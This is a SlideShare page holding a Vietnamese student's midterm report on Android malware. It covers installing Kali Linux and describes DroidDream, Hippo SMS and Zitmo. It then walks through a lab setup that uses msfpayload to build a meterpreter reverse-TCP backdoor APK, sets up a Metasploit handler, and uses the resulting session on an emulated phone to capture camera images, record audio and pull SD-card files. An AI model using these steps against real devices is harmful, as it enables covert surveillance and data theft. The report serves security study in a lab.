SlideShare a Scribd company logo
1 of 24
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
1 
BÁO CÁO GIỮA KỲ 
MỤC LỤC : 
I / Thực hiện trên mạng Lan ( wifi ) 
1/ Tìm hiểu Kali Linux ............................................................................................................... 1 
2/ Cài đặt Kali Linux trên máy ảo VMWare ............................................................................. 2 
3. Nghiên cứu lỗ hổng bảo mật trên Android 
3.1. Malware trên Android. ........................................................................................ 10 
3.2. Cơ chế hoạt động của Malware. .......................................................................... 10 
4. Tạo mã độc trên Kali Linux để xâm nhập Android thực hiện khai thác data 
trong SD card , came ra , mic của smartphone .................................................................... 11 
I / Thực hiện trên mạng Lan ( wifi ) 
1/ Tìm hiểu Kali Linux 
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra 
bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, 
xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm 
liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của 
BackTrack có tên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và 
phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng 
cần sử dụng khi tác nghiệp. 
Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với 
BackTrack, Kali có rất nhiều cải tiến: 
Kali phát triển trên nền tảng hệ điều hành Debian 
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ 
phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các 
bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) 
đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của 
Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống 
tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã 
nguồn của các công cụ. 
Tính tương thích kiến trúc 
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc 
ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build 
Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. 
Hỗ trợ mạng không dây tốt hơn 
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ 
trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. 
Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây. 
Khả năng tùy biến cao 
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao 
diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc 
XFCE tùy theo sở thích và thói quen sử dụng. 
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai 
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành 
Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài 
lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). 
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ 
dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài 
lại mới hoàn toàn nữa 
2 
2/ Cài đặt Kali Linux trên máy ảo VMWare 
Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này 
ta sẽ tiến hành cài phiên bản Kali Linux 1.0.7 64 bit. http://www.kali.org/downloads/
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm 
3 
trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo. 
Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên 
cửa sổ mới mở, chọn custom và nhấn next 
Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó:
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
4 
Đặt tên và đặt đường dẫn cho máy ảo 
Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định. 
Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
5 
Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường... 
Tiếp theo chọn Root password, luôn nhớ Root password đã chọn! 
Phần Partition chọn Guided – use entire disk và All files in one partition
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
6 
Chọn Finish partitioning and write changes to disk
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
7 
Chọn Yes 
Nhấn continue để bắt đầu cài đặt khoảng 15 phút.
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
Sau khi cài đặt xong (quá trình tốn khá nhiều thời gian , tầm 20 phút ) , chọn No ở 
8 
Network mirror, chọn Yes ở phần Boot-loader.
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root và 
9 
password đã đặt ở phần trước. 
Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
3. Nghiên cứu lỗ hổng bảo mật trên Android. 
3.1. Malware trên Android. 
Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềm 
máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sử dụng 
không hề hay biết. 
Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉ 
dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan. 
Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như 
một phần mềm gián điệp (Trojan) hơn là một virus 
phá hủy. 
3.2. Cơ chế hoạt động của Malware. 
Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware 
10 
DroidDream. Malware này hoạt động qua 2 giai đoạn: 
- Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng 
chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của 
bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên. 
- Giai đoạn 2 : Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép 
quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm 
tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi DroidDream chiếm được 
quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, 
DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này 
nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. 
Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây 
nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều 
nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này được 
lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng 
ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều 
này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc 
smartphone của mình. 
Mục đích của Malware DroidDream
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của 
con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự 
động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến 
đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được tìm thấy mới đây 
có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền 
cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. 
Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động 
liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code 
dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực 
sẽ bị thu thập bởi các malware này. 
Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. 
Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, 
vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của 
người dùng hệ điều hành này. 
11 
4. Tạo mã độc trên Kali Linux để xâm nhập Android thực hiện khai thác data trong SD 
card , camera , mic của smartphone 
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android 
tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng 
Vmware, ta nên thiết lập phần Network như sau: 
Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
Bấm vào Network Adapter và chọn Bridged: connection directly to the physical 
12 
network 
Bấm vào Edit -> Virtual Network Editor...
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
Trên phần Bridge (connect VMs directly to the external network) chọn adapter của 
13 
máy thật 
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
Đầu tiên mở terminal 
192.168.199.139 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP 
14 
của máy Kali 
gõ dòng lệnh 
msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > 
/root/Desktop/madoc.apk
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng 
Lệnh trên sẽ tạo ra 1 file madoc.apk trên desktop của Kali, đây chính là một Metasploit 
15 
reverse tcp backdoor.
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
16 
Tiếp theo, gõ lệnh msfconsole
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
17 
Sau khi msfconsole load xong : 
ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau: 
use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên. 
set lport 8080– nhập port giống với port khi tạo payload ở trên. 
Exploit 
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
Thử với một máy sony xperia z giả lập, tải về madoc.apk, cài đặt và mở lên được giao 
18 
diện như dưới, nhấp vào nút reverse_tcp:
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
19 
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
20 
Để xem thông tin về máy, nhập lệnh SysInfo 
 Sử dụng camera: 
Để xem danh sách camera, nhập webcam_list 
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở 
danh sách camera ở phần trước. Ví dụ như sau:
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
File hình đã chụp từ camera của máy android là XCCRDJmb.jpeg được lưu ở 
21 
/root của máy 
 Ghi âm 
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
22 
 Lấy file từ sd card 
Để vào sdcard, nhập lệnh :cd /sdcard và lệnh ls để xem danh sách file, thư mục 
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard 
Dùng lệnh cd /sdcard/Download để vào thư mục
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
23 
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh 
Download App.apk 
Và file này sẽ được tải về thư mục root của máy Kali
Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên 
điện thoại sử dụng Android và gửi ra ngoài 
SVTT : Trần Trọng An 
---------------------------------------------------------------------------------------------------------------------------- 
24 
Link slide : 
- Cài đặt Kali Linux : http://www.slideshare.net/anhhieu7/v-thanh-hiu-ci-t-kali-trn-vmware- 
37275588?qid=dcdc75e1-7b02-4fd6-8961-9c6b938d5ae2&v=default&b=&from_search=1# 
- Tạo mã độc trên Kali Linux để xâm nhập Android : http://www.slideshare.net/anhhieu7/v-thanh- 
hiu-to-m-c-trn-kali -linux-xm-nhp-android 
Link youtube : 
- Cài đặt Kali Linux : https://www.youtube.com/watch?v=Y2qbLB8peJQ 
- Tạo mã độc trên Kali Linux để xâm nhập Android : http://youtu.be/twqDSszrQ1o

More Related Content

Similar to Bao caogiuaki

Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
Nguyen Anh
 
Google chrome os (perfect version)
Google chrome os (perfect version)Google chrome os (perfect version)
Google chrome os (perfect version)
En Tj Pj
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
Vũ Anh
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
Vũ Anh
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2
Con Ranh
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctap
Long Prồ
 

Similar to Bao caogiuaki (20)

Kali linux
Kali linuxKali linux
Kali linux
 
Athena tuần 1
Athena tuần 1Athena tuần 1
Athena tuần 1
 
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENABÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
1
11
1
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Google chrome os (perfect version)
Google chrome os (perfect version)Google chrome os (perfect version)
Google chrome os (perfect version)
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
 
Bao cao
Bao caoBao cao
Bao cao
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctap
 

More from Trọng An

Báo cáo trần trong an
Báo cáo trần trong anBáo cáo trần trong an
Báo cáo trần trong an
Trọng An
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Trọng An
 
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Trọng An
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt Genmymotion
Trọng An
 

More from Trọng An (6)

Báo cáo trần trong an
Báo cáo trần trong anBáo cáo trần trong an
Báo cáo trần trong an
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
 
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt Genmymotion
 
Genmymotion
GenmymotionGenmymotion
Genmymotion
 
Trantrongan
TrantronganTrantrongan
Trantrongan
 

Bao caogiuaki

  • 1. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 1 BÁO CÁO GIỮA KỲ MỤC LỤC : I / Thực hiện trên mạng Lan ( wifi ) 1/ Tìm hiểu Kali Linux ............................................................................................................... 1 2/ Cài đặt Kali Linux trên máy ảo VMWare ............................................................................. 2 3. Nghiên cứu lỗ hổng bảo mật trên Android 3.1. Malware trên Android. ........................................................................................ 10 3.2. Cơ chế hoạt động của Malware. .......................................................................... 10 4. Tạo mã độc trên Kali Linux để xâm nhập Android thực hiện khai thác data trong SD card , came ra , mic của smartphone .................................................................... 11 I / Thực hiện trên mạng Lan ( wifi ) 1/ Tìm hiểu Kali Linux Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với BackTrack, Kali có rất nhiều cải tiến: Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
  • 2. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ. Tính tương thích kiến trúc Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây. Khả năng tùy biến cao Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa 2 2/ Cài đặt Kali Linux trên máy ảo VMWare Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.7 64 bit. http://www.kali.org/downloads/
  • 3. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm 3 trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo. Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên cửa sổ mới mở, chọn custom và nhấn next Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó:
  • 4. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 4 Đặt tên và đặt đường dẫn cho máy ảo Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định. Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install
  • 5. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 5 Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường... Tiếp theo chọn Root password, luôn nhớ Root password đã chọn! Phần Partition chọn Guided – use entire disk và All files in one partition
  • 6. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 6 Chọn Finish partitioning and write changes to disk
  • 7. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 7 Chọn Yes Nhấn continue để bắt đầu cài đặt khoảng 15 phút.
  • 8. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- Sau khi cài đặt xong (quá trình tốn khá nhiều thời gian , tầm 20 phút ) , chọn No ở 8 Network mirror, chọn Yes ở phần Boot-loader.
  • 9. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root và 9 password đã đặt ở phần trước. Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware
  • 10. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 3. Nghiên cứu lỗ hổng bảo mật trên Android. 3.1. Malware trên Android. Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sử dụng không hề hay biết. Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như một phần mềm gián điệp (Trojan) hơn là một virus phá hủy. 3.2. Cơ chế hoạt động của Malware. Lấy một ví dụ cụ thể về 1 Malware rất 